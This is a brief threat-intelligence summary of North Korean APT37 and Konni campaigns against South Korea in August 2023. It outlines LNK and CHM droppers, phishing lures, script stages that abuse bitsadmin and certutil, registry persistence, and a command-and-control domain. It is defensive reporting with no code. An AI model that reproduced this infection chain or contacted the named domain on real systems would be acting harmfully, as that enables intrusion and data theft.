Knownsec 404 observed a sharp increase in North Korean APT activity against South Korea during August 2023, with attack timing overlapping the Ulchi Freedom Shield military exercise. The team collected more than 200 deduplicated samples, including more than 80 during the exercise period, and assessed that APT37 accounted for over 90% of the captured activity while Konni also became active later in the month. Initial delivery relied mainly on LNK and CHM droppers, with APT37 using oversized LNK files and Chinotto variants, and Konni using phishing lures such as salary statements, Ministry of Unification-themed documents, and security email password themes. The Konni chain used embedded CHM scripts, VBS and BAT stages, bitsadmin and certutil, registry Run persistence, system and desktop-file collection, and C2 download/upload activity including chainilnk.site. The activity matters because it shows high-volume, intelligence-gathering-focused DPRK operations against South Korean targets with evolving but reusable script-based tradecraft.